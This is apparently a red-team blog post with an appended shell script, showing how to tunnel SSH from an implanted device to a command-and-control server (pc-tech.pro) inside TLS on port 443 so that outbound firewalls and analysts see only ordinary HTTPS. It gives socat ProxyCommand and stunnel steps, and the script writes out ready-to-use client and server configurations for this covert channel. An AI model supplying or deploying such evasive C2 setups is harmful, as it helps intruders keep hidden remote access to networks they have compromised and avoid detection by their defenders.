SSL/TLS Tunneling to Bypass Filters & Avoid Detection

In certain environments, controls such as firewalls are in place that restrict outbound ports and protocols. For example, maybe only web traffic over ports 80 (HTTP) and 443 (HTTPS) is allowed outbound from a given workstation.

In campaigns I have performed, I have had scenarios where we needed to control a device remotely (such as a Raspberry Pi) where direct terminal access (such as SSH) would be ideal. But this requires an established external connection, where there are a few issues to consider:

- Outbound SSH over port 22 may be blocked.
- Outbound SSH traffic over a non-standard port (anything other than 22) may be blocked.
- Even if neither of the above is blocked, anomalous outbound SSH traffic on any port is suspicious and may trigger alerts and/or attract unwanted attention from a threat hunter or analyst.

As an attacker we always want to make any inbound/outbound traffic look as normal as possible to ensure the operational security of our campaign. As the most common outbound traffic is likely web traffic, let's emulate this. There are a few tools we can use to make this happen. Best part is they are free and open source.

The first step in emulating web traffic is making our communication speak the same protocol as the normal traffic. HTTPS traffic (encrypted HTTP) uses SSL/TLS (Secure Sockets Layer / Transport Layer Security) encryption to ensure that all communication between the web browser and the web server is safe from a third party seeing what is being transferred. Any website where you see the lock icon next to the URL is using such encryption to protect your data. TLS is the preferred method, as TLS is the successor to SSL and every version of SSL is now deprecated.

How does this benefit an attacker? Since these protocols encrypt the traffic within them, if we can use SSL/TLS to encapsulate SSH traffic, the SSH traffic would be shielded from detection, unless there is a security device in the middle that can decrypt the SSL/TLS traffic (a TLS-inspecting proxy would see the SSH banner inside the session as soon as it strips the TLS layer). Because the outer layer is a real TLS session to a real domain with a valid certificate, from the network's point of view it is an HTTPS connection like any other.

Socat is a tool that is used to transfer data between two addresses using a desired protocol. Since we want to communicate with our C2 server using TLS, we can create this transfer pipe using OpenSSL. For our demonstration, we will use our 'pc-tech.pro' domain for C2 (Ubuntu server hosted in Amazon AWS).

1) Install socat on the implanted/rogue device (sudo apt install socat).
2) Modify our SSH config file for our user to use ProxyCommand to establish a tunnel using OpenSSL to our C2 domain using port 443.

What this configuration does is that for any SSH connection to 'pc-tech.pro', socat will be used to create a TLS tunnel, using the site's certificates, for the SSH traffic to be encapsulated in.

Now that we have a means of encapsulating SSH traffic to our C2 server, we need something to receive and decrypt the traffic. In short, stunnel is a tool designed to add TLS encryption to applications that do not speak the protocol natively. In our case, it will be used to host the TLS certificates used for our encapsulation, decrypt incoming traffic, and forward the traffic to another port.

1) The first step in our configuration is to install the software on the C2 server: (sudo apt install stunnel4)
2) Set up the configuration file (/etc/stunnel/nf). This will need to be created as it does not exist by default. It should:
- Define rules for the specified traffic type (SSH for us).
- Listen on all interfaces on port 443 (HTTPS).
- Decrypt all incoming traffic on port 443 and forward it to a port of your choice (2222 for us).

For our TLS certificates, we used Let's Encrypt certificates that can be used for webpages. Setting these up is outside the scope of this paper, but you can read more about this on their website.

3) Enable stunnel in its defaults file (/etc/default/stunnel4): change "ENABLED=0" to "ENABLED=1".
4) Start the service: (sudo service stunnel4 start)

The following diagram is a visual of the steps we have taken so far.

You may be asking, "Why are we forwarding traffic to port 2222 instead of standard SSH (port 22)?" This is because we are going to be hosting 3 services off this one port.
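The following script is an added example and is not code from the original post. It renders both halves of the setup described above, the client-side ~/.ssh/config stanza that hands the SSH stream to socat's OPENSSL address, and the server-side stunnel configuration that terminates TLS on 443 and forwards plaintext to sshd on 2222, into a scratch directory so they can be reviewed before being copied into place. Assumptions it makes that the post does not state: the stunnel config lives at /etc/stunnel/stunnel.conf, the Let's Encrypt files are the standard certbot fullchain.pem/privkey.pem under /etc/letsencrypt/live/pc-tech.pro/, the client trusts the system CA bundle at /etc/ssl/certs/ca-certificates.crt, the server login user is "ubuntu", and sshd itself is moved to port 2222 (stunnel only forwards; something has to be listening there).

```shell
#!/bin/sh
# Added example, not from the original post. Renders the client (socat) and
# server (stunnel4) configuration for tunnelling SSH inside TLS on port 443.
# Assumed values: domain, user, certificate paths and CA bundle path below.

C2_HOST="pc-tech.pro"        # assumed C2 domain from the post
C2_USER="ubuntu"             # assumed login user on the AWS Ubuntu host
TLS_PORT=443                 # port the outside world sees (HTTPS)
SSH_PORT=2222                # local port stunnel forwards decrypted SSH to
CA_BUNDLE="/etc/ssl/certs/ca-certificates.crt"   # assumed client trust store

# Client side: ~/.ssh/config stanza. ssh never opens its own TCP socket;
# socat opens a TLS session to %h:443 and pipes the SSH stream through it.
# verify=1 + cafile makes socat reject a MITM presenting an untrusted cert.
client_ssh_config() {
  cat <<EOF
Host ${C2_HOST}
    User ${C2_USER}
    ProxyCommand socat - OPENSSL:%h:${TLS_PORT},verify=1,cafile=${CA_BUNDLE}
EOF
}

# Server side: /etc/stunnel/stunnel.conf (assumed path). Listen on 443 with
# the site's Let's Encrypt certificate, strip TLS, connect to sshd on 2222.
# Binding to 127.0.0.1 on the connect side keeps plaintext SSH off the wire.
server_stunnel_config() {
  cat <<EOF
; drop privileges after binding port 443
setuid = stunnel4
setgid = stunnel4
pid = /var/run/stunnel4/stunnel.pid
; assumed certbot paths for ${C2_HOST}
cert = /etc/letsencrypt/live/${C2_HOST}/fullchain.pem
key = /etc/letsencrypt/live/${C2_HOST}/privkey.pem

[ssh]
accept = ${TLS_PORT}
connect = 127.0.0.1:${SSH_PORT}
EOF
}

# /etc/default/stunnel4: the Debian/Ubuntu init script refuses to start
# unless ENABLED=1.
stunnel_defaults() {
  printf 'ENABLED=1\n'
}

# sshd_config fragment: sshd must actually listen on the forwarded port,
# otherwise stunnel accepts the TLS session and then fails the backend connect.
sshd_port_config() {
  printf 'Port %s\n' "${SSH_PORT}"
}

# Static consistency check on a rendered stunnel config: the accept port must
# be the HTTPS port and the connect target must be the local SSH port.
# Returns 0 when consistent, 1 otherwise.
check_stunnel_config() {
  conf="$1"
  accept=$(sed -n 's/^accept *= *//p' "$conf")
  connect=$(sed -n 's/^connect *= *//p' "$conf")
  [ "$accept" = "$TLS_PORT" ] && [ "$connect" = "127.0.0.1:${SSH_PORT}" ]
}

# Write all four fragments into a scratch directory (or one given as $1) and
# print its path. Nothing is installed; copy the files into place by hand.
render_all() {
  out="${1:-$(mktemp -d)}"
  client_ssh_config > "$out/ssh_config"
  server_stunnel_config > "$out/stunnel.conf"
  stunnel_defaults > "$out/stunnel4.default"
  sshd_port_config > "$out/sshd_port.conf"
  echo "$out"
}
```

Run it with `dir=$(render_all) && check_stunnel_config "$dir/stunnel.conf" && ls "$dir"`; the files map onto ~/.ssh/config on the implant and /etc/stunnel/stunnel.conf, /etc/default/stunnel4 and a drop-in for sshd on the C2 host. After `ssh pc-tech.pro`, a packet capture on the implant's uplink shows only a TLS handshake and application data to port 443, which is the property the post is after.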